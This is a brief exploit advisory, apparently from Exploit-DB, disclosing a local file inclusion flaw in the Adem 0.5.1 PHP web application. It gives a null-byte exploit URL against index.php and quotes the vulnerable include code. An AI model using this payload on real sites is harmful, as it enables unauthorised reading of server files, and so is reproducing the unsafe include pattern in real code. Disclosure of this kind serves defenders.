Adem 0.5.1 - Local File Inclusion

EDB-ID:

33072

CVE:



Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2014-04-28


----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
 
Author        : JIKO
 
----------[Script Info]
 
Site        : https://github.com/4FSB/Adem && http://adem.faares.com/demo
Version     : 0.5.1
Download    : https://codeload.github.com/4FSB/Adem/zip/master
 
----------[exploit Info]
 
Exploit :
http://Path/index.php?p=File%00

Line : 8-10
Page : index.php
Code :
     if(is_file($file) && file_exists($file)){
            include $file;
       

 }
----------[exploit Fin]